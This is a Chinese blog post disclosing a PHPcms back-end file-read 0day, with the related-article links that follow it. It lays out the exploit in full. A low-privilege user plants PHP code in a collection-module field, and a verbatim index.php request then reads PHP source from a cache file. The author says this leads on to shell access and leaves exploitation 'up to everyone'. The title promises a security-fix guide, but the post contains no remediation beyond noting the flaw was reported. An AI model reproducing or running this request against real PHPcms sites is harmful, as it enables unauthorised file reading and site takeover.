搬瓦工中文网
后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
未经允许不得转载:搬瓦工中文网 » PHPcms后台普通用户读文件0day漏洞深度解析与安全修复指南
相关推荐
- dedecms注册中文会员后空间打不开问题详解及快速解决方案
- 如何修改WordPress上传临时目录来解决WordPress无法安装插件包
- WordPress query_posts函数实现个性化文章调用方法详解
- 如何禁用WordPress Gravatar并使用本地头像以大幅提升网页加载速度
- 织梦Dedecms5.7整站如何快速调用购物车订单数量
- DedeCms 5.7后台首页加载缓慢问题详解及高效解决方案
- DEDECMS如何精确截取上/下一篇文章标题长度以提高用户体验
- WordPress如何轻松自定义多个边栏以提升网站用户体验
- WordPress wp_nav_menu()函数全面指南:自定义导航菜单深度解析与应用技巧
- 如何安全有效地去除织梦DedeCMS系统后台安全提示
